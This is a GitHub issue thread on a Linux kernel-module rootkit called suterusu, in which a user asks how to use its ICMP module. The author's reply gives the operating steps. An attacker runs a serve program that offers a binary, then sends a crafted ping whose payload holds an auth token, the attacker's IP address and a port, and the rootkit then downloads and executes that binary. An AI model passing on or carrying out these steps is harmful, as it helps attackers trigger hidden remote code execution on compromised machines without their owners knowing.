search

mncoppola / suterusu

An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM
MIT License
635 stars 210 forks source link

How to use ICMP modules #8

Closed isafe closed 9 years ago

isafe commented 9 years ago

Hello: How to use ICMP modules? I compile ICMP modules,but i don't know how to use it

mncoppola commented 9 years ago

Hi, if I remember correctly there are two steps:

  1. Compile and run ./serve (./serve [port] [binary])
  2. ping 1.2.3.4 -p [hex AUTH_TOKEN][hex your IP address][hex port number] -s 10

Suterusu is basically casting the payload of the ICMP packet to https://github.com/mncoppola/suterusu/blob/master/icmp.c#L9 and checking against that. It also verifies the payload is 10 bytes large, i.e. AUTH_TOKEN=4, IP address=4, port number=2.

Then Suterusu should receive the ICMP packet, detect that it's a special packet, and download + execute the binary. If you're having issues getting it to trigger, I'd recommend turning on debugging and watching dmesg.

isafe commented 9 years ago

I got it,Thank you!